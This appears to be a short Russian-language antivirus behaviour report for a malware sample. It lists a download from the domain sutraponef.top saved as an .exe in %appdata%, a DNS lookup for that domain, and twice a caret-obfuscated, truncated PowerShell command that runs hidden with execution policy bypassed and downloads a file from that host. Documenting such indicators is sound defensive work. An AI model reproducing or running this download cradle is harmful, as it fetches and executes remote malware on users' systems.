Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^R^s^h^Ell^.^EXE -^E^X^e^C^Uti^ONp^oLIcy b^yPaSS -^NOp^R^O^fILe^ -WIND^o^wstY^L^e hi^ddEN (ne^W^-^ob^jEc^t ^SY^ST^Em^.nEt^.WEB^cLIE^nt)^.^DO^WNlo^A^DF^IlE(^'http://sutraponef.to...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^R^s^h^Ell^.^EXE -^E^X^e^C^Uti^ONp^oLIcy b^yPaSS -^NOp^R^O^fILe^ -WIND^o^wstY^L^e hi^ddEN (ne^W^-^ob^jEc^t ^SY^ST^Em^.nEt^.WEB^cLIE^nt)^.^DO^WNlo^A^DF^IlE(^'http://sutraponef.to...' (со скрытым окном)